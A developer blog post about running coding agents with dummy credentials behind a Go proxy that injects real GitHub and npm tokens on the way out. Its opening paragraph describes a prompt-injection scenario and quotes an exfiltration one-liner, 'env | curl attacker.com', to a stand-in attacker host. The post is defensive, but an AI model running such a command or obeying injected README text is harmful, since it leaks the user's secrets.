Skip to main content

Command Palette

Search for a command to run...

My coding agents run with zero secrets (and they don't even know)

Updated
2 min readView as Markdown

I run Claude Code and Codex in yolo mode. --dangerously-skip-permissions, the whole thing. Which is great until you remember prompt injection is real and one cursed README could make the agent go env | curl attacker.com and yeet my GitHub token into the void.

So I fixed it. No paid sandbox product, no platform. One small Go proxy and one idea stolen from the big kids: the agent never holds a real credential. Ever.

The result is yagop/sandbox.

The trick

The agent lives on an internal Docker network. It literally cannot reach the internet. Its only way out is the proxy, which holds my actual GH_TOKEN and NPM_TOKEN and stamps the right Authorization header onto each request as it leaves.

Inside the container? GH_TOKEN=dummy. An npm token that says dummy. Git remotes rewritten from SSH to HTTPS so there is not even a key file to steal. The agent thinks it is authenticated (it is!) but if it gets prompt-injected and tries to exfiltrate its secrets, there is nothing to grab. You cannot leak what you never had. Iconic behavior honestly.

The whole policy is a lil JSON file

{
  "rules": [
    { "host": "api.github.com", "header": "Authorization", "value": "Bearer ${GH_TOKEN}" },
    { "host": "github.com", "header": "Authorization", "value": "Basic ${GH_BASIC}" },
    { "host": "registry.npmjs.org", "header": "Authorization", "value": "Bearer ${NPM_TOKEN}" }
  ]
}

Secrets are resolved by name from the environment when the proxy starts, so proxy up grabs a fresh gh auth token and proxy reload rotates them without restarting anything. They never appear in the config, the command line, or the sandbox.

Do you need a product for this?

Slicer, Docker Sandboxes, and Infisical's agent-vault all ship this exact pattern, and they are genuinely good, especially agent-vault if you need per-agent scoping or a team setup. But for one dev on one laptop? It is a few hundred lines of Go and a JSON file.

Tokens stay home. Agents stay feral. Everybody wins.